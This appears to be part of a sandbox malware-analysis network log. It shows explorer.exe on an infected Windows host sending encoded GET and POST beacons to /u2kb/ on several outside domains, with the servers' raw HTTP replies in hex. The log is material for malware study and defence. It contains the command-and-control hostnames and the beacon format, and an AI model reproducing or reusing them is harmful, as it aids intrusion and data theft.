                                                                                            Mar 20, 2023 17:00:39.794667959 CET169INData Raw: 2d 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 39 5d 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 6a 73 2f 68 74 6d 6c 35 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22
                                                                                            Data Ascii: ->...[if lt IE 9]><script src="js/html5.js"></script><link rel="stylesheet" href="css/docs.css" type="text/css" media="screen"><link rel="stylesheet" href="css/ie.css" type="text/css" media="screen"><link href='http://fonts.googleap
                                                                                            Mar 20, 2023 17:00:39.794712067 CET170INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 22 3e 50 72 6f 63 65 73 73 20 30 31 3c 2f 61 3e 3c 2f 6c 69 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22
                                                                                            Data Ascii: <li><a href="/">Process 01</a></li> <li><a href="/">Process 02</a></li> <li><a href="/">Process 03</a></li> </ul> </li> <li><a href="con
                                                                                            Mar 20, 2023 17:00:39.794739962 CET171INData Raw: 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20
                                                                                            Data Ascii: > </form> </div> </div> </div> </div> </div> </div></div>... footer --><footer> <div class="container clearfix"> <ul class="list-social pull-right"> <li><a


                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                            14192.168.2.449710199.192.30.14780C:\Windows\explorer.exe
                                                                                            TimestampkBytes transferredDirectionData
                                                                                            Mar 20, 2023 17:00:42.185417891 CET172OUTGET /u2kb/?s7=Yd5Rzn4EVOpL1Cl/e5Amzdaa+E7UlYBpl8BtE0ZhlgLGbR5cH1Fns9iDSFPM0EqDoX1il4mP+EMsdt2zebBtiTAOJDfFAse6Fg==&pJ=y0bMVGhK3R HTTP/1.1
                                                                                            Host: www.shapshit.xyz
                                                                                            Connection: close
                                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                                            Data Ascii:
                                                                                            Mar 20, 2023 17:00:42.543080091 CET173INHTTP/1.1 404 Not Found
                                                                                            Date: Mon, 20 Mar 2023 16:00:42 GMT
                                                                                            Server: Apache
                                                                                            Content-Length: 4406
                                                                                            Connection: close
                                                                                            Content-Type: text/html; charset=utf-8
                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 43 6f 64 65 73 74 65 72 20 7c 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 72 65 73 70 6f 6e 73 69 76 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 33 30 30 27 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 73 75 70 65 72 66 69 73 68 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 65 61 73 69 6e 67 2e 31 2e 33 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 63 6f 6f 6b 69 65 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 6a 51 75 65 72 79 28 77 69 6e 64 6f 77 29 2e 6c 6f 61 64 28 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 6a 51 75 65 72 79 28 27 2e 73 70 69 6e 6e 65 72 27 29 2e 61 6e 69 6d 61 74 65 28 7b 0d 0a 20 20 20 20 20 20 20 20 27 6f 70 61 63 69 74 79 27 3a 20 30 0d 0a 20 20 20 20 7d 2c 20 31 30 30 30 2c 20 27 65 61 73 65 4f 75 74 43 75 62 69 63 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 6a 51 75 65 72 79 28 74 68 69 73 29 2e 63 73 73 28 27 64 69 73 70 6c 61 79 27 2c 20 27 6e 6f 6e 65 27 29 0d 0a 20 20 20 20 7d 29 3b 0d 0a 7d 29 3b 0d 0a 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 38 5d 3e 0d 0a 3c 64 69 76 20 73 74 79 6c 65 3d 27 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 27 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 77 69 6e 64 6f 77 73 2f 69 6e 74 65 72 6e 65 74 2d 65 78 70 6c 6f 72 65 72 2f 64 65 66 61 75 6c 74 2e 61 73 70 78 3f 6f 63 69 64 3d 69 65 36 5f 63 6f 75 6e 74 64 6f 77 6e 5f 62 61 6e 6e 65 72 63 6f 64 65 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 74 68 65 69 65 36 63 6f 75 6e 74 64 6f 77 6e 2e 63 6f 6d 2f 69 6d 67 2f 75 70 67 72 61 64 65 2e 6a 70 67 22 62 6f 72 64 65 72 3d 22 30 22 61 6c 74 3d 22 22 2f 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 20 20 0d 0a 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 28 67 74 20 49 45 20 39 29 7c 21 28 49 45 29 5d 3e 3c 21 2d 2d 3e 0d
                                                                                            Data Ascii: <!DOCTYPE html><html lang="en"><head><title>Codester | 404</title><meta charset="utf-8"><link rel="stylesheet" href="/css/bootstrap.css" type="text/css" media="screen"><link rel="stylesheet" href="/css/responsive.css" type="text/css" media="screen"><link rel="stylesheet" href="/css/style.css" type="text/css" media="screen"><link href='http://fonts.googleapis.com/css?family=Open+Sans:400,300' rel='stylesheet' type='text/css'><script src="/js/jquery.js"></script><script src="/js/superfish.js"></script><script src="/js/jquery.easing.1.3.js"></script><script src="/js/jquery.cookie.js"></script><script>jQuery(window).load(function () { jQuery('.spinner').animate({ 'opacity': 0 }, 1000, 'easeOutCubic', function () { jQuery(this).css('display', 'none') });});</script>...[if lt IE 8]><div style='text-align:center'><a href="http://www.microsoft.com/windows/internet-explorer/default.aspx?ocid=ie6_countdown_bannercode"><img src="http://www.theie6countdown.com/img/upgrade.jpg"border="0"alt=""/></a></div> <![endif]-->...[if (gt IE 9)|!(IE)]>...>
                                                                                            Mar 20, 2023 17:00:42.543170929 CET174INData Raw: 0a 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 39 5d 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 6a 73 2f 68 74 6d 6c 35 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 6c 69 6e 6b 20 72
                                                                                            Data Ascii: ...<![endif]-->...[if lt IE 9]><script src="js/html5.js"></script><link rel="stylesheet" href="css/docs.css" type="text/css" media="screen"><link rel="stylesheet" href="css/ie.css" type="text/css" media="screen"><link href='http:/
                                                                                            Mar 20, 2023 17:00:42.543256998 CET176INData Raw: 20 3c 75 6c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 22 3e 50 72 6f 63 65 73 73 20 30 31 3c 2f 61 3e 3c 2f 6c 69 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                            Data Ascii: <ul> <li><a href="/">Process 01</a></li> <li><a href="/">Process 02</a></li> <li><a href="/">Process 03</a></li> </ul> </li> <
                                                                                            Mar 20, 2023 17:00:42.543301105 CET176INData Raw: 65 61 72 63 68 3c 2f 61 3e 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20
                                                                                            Data Ascii: earch</a> </div> </form> </div> </div> </div> </div> </div> </div></div>... footer --><footer> <div class="container clearfix"> <ul class="list-social pull-right">


                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                            15192.168.2.44971185.187.128.3480C:\Windows\explorer.exe
                                                                                            TimestampkBytes transferredDirectionData
                                                                                            Mar 20, 2023 17:00:47.856537104 CET178OUTPOST /u2kb/ HTTP/1.1
                                                                                            Host: www.thedivinerudraksha.com
                                                                                            Connection: close
                                                                                            Content-Length: 184
                                                                                            Cache-Control: no-cache
                                                                                            Origin: http://www.thedivinerudraksha.com
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Accept: */*
                                                                                            Referer: http://www.thedivinerudraksha.com/u2kb/
                                                                                            Accept-Language: en-US
                                                                                            Accept-Encoding: gzip, deflate
                                                                                            Data Raw: 73 37 3d 76 6b 52 79 55 54 39 48 56 37 31 4b 53 39 69 70 58 76 6c 62 5a 2d 54 52 6a 2d 42 6f 6b 59 51 73 52 45 6b 54 6f 4b 39 64 75 5a 43 34 65 75 6b 6a 35 6a 76 55 30 52 32 72 47 74 7e 63 4f 39 70 54 28 75 4a 6c 4f 4d 47 50 6d 6e 75 76 6d 70 62 69 65 73 38 32 31 49 63 74 65 59 51 61 48 5a 57 45 65 4b 70 71 69 6d 38 45 48 68 4b 41 62 7a 64 2d 31 61 32 6d 50 56 73 46 53 57 56 71 31 73 30 72 35 4e 63 38 39 75 50 59 77 6d 71 4b 38 34 73 48 4b 63 46 38 53 75 31 48 6a 77 4f 66 4a 4d 31 36 33 67 32 6d 46 56 73 77 33 51 47 62 7e 31 69 66 7e 67 29 2e 00 00 00 00 00 00 00 00
                                                                                            Data Ascii: s7=vkRyUT9HV71KS9ipXvlbZ-TRj-BokYQsREkToK9duZC4eukj5jvU0R2rGt~cO9pT(uJlOMGPmnuvmpbies821IcteYQaHZWEeKpqim8EHhKAbzd-1a2mPVsFSWVq1s0r5Nc89uPYwmqK84sHKcF8Su1HjwOfJM163g2mFVsw3QGb~1if~g).
                                                                                            Mar 20, 2023 17:00:49.285394907 CET180INHTTP/1.1 404 Not Found
                                                                                            Connection: close
                                                                                            x-powered-by: PHP/8.0.28
                                                                                            expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                            cache-control: no-cache, must-revalidate, max-age=0
                                                                                            content-type: text/html; charset=UTF-8
                                                                                            link: <https://thedivinerudraksha.com/wp-json/>; rel="https://api.w.org/"
                                                                                            content-length: 11417
                                                                                            content-encoding: gzip
                                                                                            vary: Accept-Encoding
                                                                                            date: Mon, 20 Mar 2023 16:00:49 GMT
                                                                                            server: LiteSpeed
                                                                                            strict-transport-security: max-age=63072000; includeSubDomains
                                                                                            x-frame-options: SAMEORIGIN
                                                                                            x-content-type-options: nosniff
                                                                                            Data Raw: 1f 8b 08 00 00 00 00 00 00 03 ed 7d 7b 73 e3 36 b2 ef df 33 55 f9 0e 58 e6 cc da da 88 14 a9 87 1f b2 ad 3d 99 64 b6 4e ce 49 36 53 99 c9 d9 da 9b 4d a9 20 12 92 38 26 09 2e 49 49 76 1c ef f7 b9 5f e3 7e b2 5b 0d 80 24 48 82 0f d9 f2 ec 64 d7 9e 1a 5b 02 1a 8d 46 a3 f1 03 d0 78 5d fe ee eb ef bf 7a ff d7 b7 6f d0 7f bd ff ee db d9 67 2f 2f d7 89 ef 21 0f 07 ab 2b 8d 04 fa 8f ef 34 16 48 b0 33 fb ec e5 8b 4b 9f 24 18 d9 6b 1c c5 24 b9 d2 7e 7c ff 27 fd 4c 63 11 89 9b 78 64 f6 16 af 08 0a 68 82 96 74 13 38 e8 f7 9f 9f 0d 2d eb 02 bd 5f 13 f4 b5 bb 75 03 82 7e d8 38 11 be 8e d7 f8 72 c0 93 bc e4 3c 03 ec 93 ab a3 88 2e 68 12 1f 21 9b 06 09 09 92 ab 23 1f df e8 ae 8f 57 44 0f 23 b2 75 c9 6e ea e1 68 45 8e d0 60 f6 f2 d2 73 83 6b 14 11 ef ea c8 09 62 20 58 92 c4 5e 1f a1 75 44 96 57 47 83 41 b2 26 0e cb 35 4a 33 35 6c ea 77 4b bb a4 41 12 1b 2b 4a 57 1e c1 a1 1b 2b 52 6a d8 4b 48 14 e0 84 68 28 b9 0d c9 95 86 c3 d0 73 6d 9c b8 34 18 44 71 fc c5 8d ef 69 88 15 f3 4a 53 e9 00 fd 3e c2 7f df d0 0b f4 27 42 1c 8d e7 ad ad 93 24 8c a7 75 d2 0f 96 84 38 03 ed c9 24 f9 8a fa 3e 09 92 78 1f 91 6c 91 46 96 2d af 54 0d aa 2d a4 51 a2 65 d5 aa ed 5c 27 59 5f 39 64 eb da 44 67 5f fa c8 0d dc c4 c5 9e 1e db d8 23 57 96 56 64 f2 ee 7f fe fa f6 cd fc fd f7 df 7f fb fa cb 1f 24 4e 85 f0 f9 db 2f 7f 78 f7 e6 87 f9 57 df 7f f7 f6 cb f7 df bc fe f6 4d 89 4b b2 26 3e d1 6d ea d1 48 e2 f1 f9 92 8c 4f c6 79 8e 61 44 43 12 25 b7 57 1a 5d 4d 99 d2 24 e2 3d 4c 5c cd 70 13 79 12 3b 50 6d bd 66 37 c3 eb c5 40 cd c6 a3 a0 27 89 13 09 e6 d0 5a 55 b4 b1 9b 90 39 68 40 22 ef 2e 30 58 94 5c 77 64 01 fc 80 36 4e 6e 3d 82 5c e7 ea 68 47 29 b3 82 c8 26 ba 1b 78 6e 90 fd b1 e3 f8 68 f6 d2 90 08 d0 92 46 3e 32 e0 b7 1e d1 1d 32 22 f2 f7 8d 1b 11 07 dd a1 ad 1b bb 0b d7 73 93 db 29 ff ec 91 0b 74 ff f2 72 c0 b2 2a b4 5b 16 12 af 09 49 8e 98 08 9b 58 67 8d 96 e5 28 da 71 6a b8 aa d6 3c b0 e3 f8 8f 4b ec bb de ed d5 1b ef 8b ef 48 1c bb 91 fb 6a f4 e5 d8 34 5f 9d 7e f5 63 b4 c0 81 1b 27 22 60 f8 d5 84 fd 3e 31 cd df 7f 6e 8e ce 2e 1c 37 0e 3d 7c 7b 15 ef 70 c8 43 b6 24 ba 3a 31 2c c3 3a 42 3e 71 5c 7c 75 84 3d af 8c 36 0a a9 59 50 59 ea 7a 9b d8 85 ba a8 8b 01 33 e7 78 f0 8d 1f 46 e4 17 0c 05 e2 7a 32 7c 37 30 a0 78 20 d2 99 61 8d f7 94 48 ae cd 43 c8 45 7d 9f 06 4c bc
                                                                                            Data Ascii: }{s63UX=dNI6SM 8&.IIv_~[$Hd[Fx]zog//!+4H3K$k$~|'Lcxdht8-_u~8r<.h!#WD#unhE`skb X^uDWGA&5J35lwKA+JW+RjKHh(sm4DqiJS>'B$u8$>xlF-T-Qe\'Y_9dDg_#WVd$N/xWMK&>mHOyaDC%W]M$=L\py;Pmf7@'ZU9h@".0X\wd6Nn=\hG)&xnhF>22"s)tr*[IXg(qj<KHj4_~c'"`>1n.7=|{pC$:1,:B>q\|u=6YPYz3xFz2|70x aHCE}L
                                                                                            Mar 20, 2023 17:00:49.285434961 CET181INData Raw: d0 db ac dc 20 1e 48 39 ec 23 6c 86 44 38 74 8d 9d 41 a3 d5 a0 23 46 ed 42 fd 43 4c 03 86 4e 12 bf 37 8e 9b fc f8 c3 37 6a d8 74 0a b0 f9 c3 bb af 3b e6 75 e3 7b 51 68 1b e1 3a fc 63 14 3b 65 ac de 79 3b 1f 07 ee 92 c4 89 2a 5b 29 9a 67 9f 67 d9
                                                                                            Data Ascii: H9#lD8tA#FBCLN77jt;u{Qh:c;ey;*[)ggX:7CbxE6"qwLCJ[12L0QQuG}}_$nwtzCaHHoalb}"AzX^/8BB7'+
                                                                                            Mar 20, 2023 17:00:49.285448074 CET182INData Raw: 35 94 9a 7d 31 ba 1b 9e 0b 5b ae 58 9c c5 2c 6e 41 6f f4 78 8d 1d ba 9b 9a 68 12 de 20 0b 7e 49 40 59 a1 d3 37 e1 d4 44 7a 03 2d 2c 9a 65 52 b0 35 cf a9 35 19 9a e1 cd 85 ae bb 41 b8 49 f8 fa 95 0e be ca a9 15 11 3f 0f 5f 8b 59 b0 1c 16 62 87 d9
                                                                                            Data Ascii: 5}1[X,nAoxh ~I@Y7Dz-,eR55AI?_Yb[W/f#G>d",s;0 cbmM7fJa+bJ1i8E2v"II:]| vo9lRTsUfJU@R7lI4axs&nc*^gGh1L$
                                                                                            Mar 20, 2023 17:00:49.285460949 CET183INData Raw: c9 5a 90 25 27 ac 47 96 9c a6 05 59 a4 92 36 21 4b 4e d6 82 2c 39 61 3d b2 48 9a 6b 42 16 a9 ae 5a 90 45 a2 6c 41 16 89 b2 1b b2 88 39 64 06 2d be 53 0b 2d be 53 0f 2d 90 4c 0d 2d be a3 84 16 df a9 87 16 c8 48 0d 2d be 53 0f 2d be a3 84 16 df a9
                                                                                            Data Ascii: Z%'GY6!KN,9a=HkBZElA9d-S-S-L-H-S-M-S-(Z@9Jh6h)%kad@$\d-CKN-RI%'kZ$5ATW-"Q@DZ/ej[C$SCRBH-ZZU=ljhV%RC
                                                                                            Mar 20, 2023 17:00:49.285475016 CET185INData Raw: 4b 56 2f 9d 08 b3 0a ea c6 b6 5a 53 22 5d a9 a2 e2 10 07 86 bd 89 c0 b8 65 a6 25 32 5c cd b6 a1 62 2b b4 a5 1a ee 04 c1 d9 89 bf 07 b4 c6 8a 39 de e5 23 44 be f9 d8 00 44 f8 02 0d d1 1f 10 87 87 de fd 3e c0 29 43 61 c9 8b 75 91 ce 12 6b 66 7f f7
                                                                                            Data Ascii: KV/ZS"]e%2\b+9#DD>)Caukf{W@s1[s8L[9DFSM!f|tj[CuZ2. `B<lkMUIw{7uQwC%i]zP2TlPlG'P6rU&>ln
                                                                                            Mar 20, 2023 17:00:49.285486937 CET186INData Raw: 6a b1 db b1 aa 3c 0e 7c 20 44 f1 ac 3f 2d 88 ca d5 71 08 88 ca b9 3d 1a a2 72 56 8f 86 a8 9c d5 63 21 2a e7 f4 68 88 ca 59 1d 00 a2 aa 46 7d 10 d9 9e 0e a2 c4 d9 ba 2d 91 ce fb 1d 72 b4 d3 70 13 0a 5f e7 9d c3 c9 9f b6 cb 8a 33 c9 1a 96 78 2d eb
                                                                                            Data Ascii: j<| D?-q=rVc!*hYF}-rp_3x-BCjw?,?aG~4C!@_gBvUN,+\"?Uwot8x"1;k}Ho2;t|MZ=}~-sK}}i'Jug{-'lrx^q@4=
                                                                                            Mar 20, 2023 17:00:49.285506010 CET187INData Raw: fc 8b 69 ea a5 30 8d 73 90 a3 05 5c 79 6e 29 0f b8 ea 4a 62 31 3a a9 81 e7 0e 58 d9 cc 78 a8 66 dc 01 fa 1a f9 0e cf 9a 67 e0 ed 0c c6 c0 a0 86 0e de 11 2e 5e 12 3e 0a 6f 94 4f 83 66 19 9f 89 e7 c7 f9 2a 5b ce 56 d9 e4 8b d3 d9 aa 0c 30 56 8b a8
                                                                                            Data Ascii: i0s\yn)Jb1:Xxfg.^>oOf*[V0V-<j_miES0#/(#E62,,q`8XxEjXD]uOc,CVPo=.Wj1d=O)6%{%c9p{'fT,}.
                                                                                            Mar 20, 2023 17:00:49.285518885 CET189INData Raw: 92 97 9b 40 0d 30 88 fc 06 43 4b 5f 62 9b c4 7a 84 23 19 08 e2 35 5e bb b0 81 2b c2 81 ab fb d8 c3 83 ca a8 02 32 67 4f c0 69 b3 77 40 8e be 01 72 f4 1d f6 70 6a f6 d5 04 cc fb af cd 0a ed c2 73 95 2a 3d 31 3f 86 4a 4f cc 03 ab d4 c7 6b ec 47 6e
                                                                                            Data Ascii: @0CK_bz#5^+2gOiw@rpjs*=1?JOkGnr>[=vg-it%PeJtk,w7F\HRvw=cG=c4/"l${-G)jv(mA`lpDiDa+l4<5[:>H+GcY`)
                                                                                            Mar 20, 2023 17:00:49.285531044 CET190INData Raw: e4 93 49 e6 c3 94 bc 23 62 bf 30 db 71 c7 7d cf d9 aa 3b 62 7e fb 2b ed 35 b6 af 61 bb 18 38 0c 0a 8b f4 72 04 77 7b c8 ee fb 17 97 8b 4d 92 50 ee 78 2e dc 99 21 ed ca 28 84 56 36 00 08 a6 f0 39 63 cc 99 b2 62 14 c7 0f 9c 13 2c e6 7b f8 36 75 18
                                                                                            Data Ascii: I#b0q};b~+5a8rw{MPx.!(V69cb,{6uqWa>]B#b{|%JW61q~%:F;7pM&pge{etw?6B~/_cTWtwz4p#f+f=7Nj1=4}-@
                                                                                            Mar 20, 2023 17:00:49.285541058 CET190INData Raw: f5 c7 6f 64 09 87 c6 a9 61 ea 3b db 38 35 46 86 59 10 55 24 ae 91 16 08 77 b6 8e 1d 47 4f f8 1d 68 70 d1 19 b9 49 22 7c 34 7b 09 35 bb b3 e7 d8 71 e6 09 9d b3 1b d2 e0 6c 99 cf 17 f1 61 9f c3 7c 13 79 da 54 fb 1b 94 89 3d 3d f9 b7 01 7f 81 12 22
                                                                                            Data Ascii: oda;85FYU$wGOhpI"|4{5qla|yT=="ppI~7W^aWZg|Ijbs{6[~UHFa.AExu3t,WTcxr{K`|*ZeV&i2BC.ZStT"7AVbE+df


                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                            16192.168.2.44971285.187.128.3480C:\Windows\explorer.exe
                                                                                            TimestampkBytes transferredDirectionData
                                                                                            Mar 20, 2023 17:00:50.553251028 CET191OUTGET /u2kb/?pJ=y0bMVGhK3R&s7=im5SXjRwbJIZeY2yeMVWNNnKg99Etck2UhYi2fNZ2Kf/X7lq2SPR1Q6pROq8Gck3yLtOH/fXnE++yuD9U7pi0eI0K5lBX7KNLg== HTTP/1.1
                                                                                            Host: www.thedivinerudraksha.com
                                                                                            Connection: close
                                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                                            Data Ascii:
                                                                                            Mar 20, 2023 17:00:51.294475079 CET192INHTTP/1.1 301 Moved Permanently
                                                                                            Connection: close
                                                                                            x-powered-by: PHP/8.0.28
                                                                                            expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                            cache-control: no-cache, must-revalidate, max-age=0
                                                                                            content-type: text/html; charset=UTF-8
                                                                                            x-redirect-by: WordPress
                                                                                            location: http://thedivinerudraksha.com/u2kb/?pJ=y0bMVGhK3R&s7=im5SXjRwbJIZeY2yeMVWNNnKg99Etck2UhYi2fNZ2Kf/X7lq2SPR1Q6pROq8Gck3yLtOH/fXnE++yuD9U7pi0eI0K5lBX7KNLg==
                                                                                            content-length: 0
                                                                                            date: Mon, 20 Mar 2023 16:00:51 GMT
                                                                                            server: LiteSpeed
                                                                                            strict-transport-security: max-age=63072000; includeSubDomains
                                                                                            x-frame-options: SAMEORIGIN
                                                                                            x-content-type-options: nosniff


                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                            17192.168.2.449713192.185.17.1280C:\Windows\explorer.exe
                                                                                            TimestampkBytes transferredDirectionData
                                                                                            Mar 20, 2023 17:01:02.846653938 CET193OUTPOST /u2kb/ HTTP/1.1
                                                                                            Host: www.un-object.com
                                                                                            Connection: close
                                                                                            Content-Length: 184
                                                                                            Cache-Control: no-cache
                                                                                            Origin: http://www.un-object.com
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Accept: */*
                                                                                            Referer: http://www.un-object.com/u2kb/
                                                                                            Accept-Language: en-US
                                                                                            Accept-Encoding: gzip, deflate
                                                                                            Data Raw: 73 37 3d 6b 54 72 45 4b 70 64 4c 49 67 35 6e 53 45 58 46 49 30 51 31 34 50 31 6a 65 47 51 39 7e 4c 69 66 52 76 67 68 61 35 32 79 77 6d 7e 62 4b 43 4f 38 32 69 72 55 51 78 72 36 28 5f 41 6e 31 32 58 39 54 56 38 71 61 54 45 52 49 35 71 74 31 7a 70 73 46 43 64 51 6a 6c 50 57 4d 47 4c 38 68 67 53 5f 36 30 6e 43 66 37 44 31 67 38 61 70 38 64 73 70 28 4e 73 43 32 4a 4b 65 65 53 56 73 76 6c 51 5a 79 6c 66 2d 64 5a 6f 34 57 4a 4d 72 76 69 63 30 64 70 42 7a 77 38 47 73 57 43 76 63 46 74 41 4e 42 34 62 52 6a 70 56 58 38 49 43 6b 66 6b 4a 6d 50 41 29 2e 00 00 00 00 00 00 00 00
                                                                                            Data Ascii: s7=kTrEKpdLIg5nSEXFI0Q14P1jeGQ9~LifRvgha52ywm~bKCO82irUQxr6(_An12X9TV8qaTERI5qt1zpsFCdQjlPWMGL8hgS_60nCf7D1g8ap8dsp(NsC2JKeeSVsvlQZylf-dZo4WJMrvic0dpBzw8GsWCvcFtANB4bRjpVX8ICkfkJmPA).
                                                                                            Mar 20, 2023 17:01:02.980871916 CET194INHTTP/1.1 404 Not Found
                                                                                            Date: Mon, 20 Mar 2023 16:01:02 GMT
                                                                                            Server: Apache
                                                                                            Upgrade: h2,h2c
                                                                                            Connection: Upgrade, close
                                                                                            Last-Modified: Sun, 19 Jun 2022 19:42:34 GMT
                                                                                            Accept-Ranges: bytes
                                                                                            Vary: Accept-Encoding
                                                                                            Content-Encoding: gzip
                                                                                            Content-Length: 462
                                                                                            Content-Type: text/html
                                                                                            Data Raw: 1f 8b 08 00 00 00 00 00 00 03 5d 92 4d 8f d3 30 10 86 ef fd 15 43 38 00 52 dd 8f a5 0b 28 1f 15 17 e0 82 d0 6a 57 70 9f c4 d3 c4 c2 f1 04 7b da a6 ac f6 bf 6f 9c b4 cb b2 f2 c1 f2 78 de 77 9e 19 3b 7f a5 b9 92 53 47 d0 48 6b b7 b3 3c 6e 60 d1 d5 45 42 2e 89 01 42 bd 9d 01 e4 2d 09 42 d5 a0 0f 24 45 b2 97 9d fa 94 fc bb 68 44 3a 45 7f f6 e6 50 24 bd da a3 aa b8 ed 50 4c 69 29 81 8a 9d 90 1b 54 86 0a d2 35 4d 3a 31 62 69 bb 59 6d e0 8b f7 ec f3 e5 14 78 b2 74 d8 52 91 1c 0c 1d 3b f6 f2 cc e5 68 b4 34 85 a6 83 a9 48 8d 87 39 18 67 c4 a0 55 a1 42 4b c5 3a 79 69 e3 b9 64 09 cf 4c 1c 1b a7 a9 9f 83 e3 1d 5b cb c7 49 12 e4 34 31 00 7c 6e 49 1b 84 50 79 22 07 e8 34 bc 6d b1 9f 0a a6 d7 ab 55 d7 bf 83 fb 31 13 a0 64 7d 82 7b d8 0d ee 2a 98 bf 94 c2 e2 03 b5 19 3c c0 98 f0 10 ad 97 67 ef 7c 39 cd 74 96 8f aa 31 5a 24 42 bd 28 b4 a6 76 29 54 03 21 f9 6c 20 8a ba 66 7d c9 19 ed 77 d8 1a 7b 4a e1 1b b1 af 0d ce 21 90 37 bb 6c e8 cc b2 4f e1 f5 06 e3 ca a0 c5 e1 da 29 e1 2e 85 4d 64 b1 c6 91 6a c8 d4 8d a4 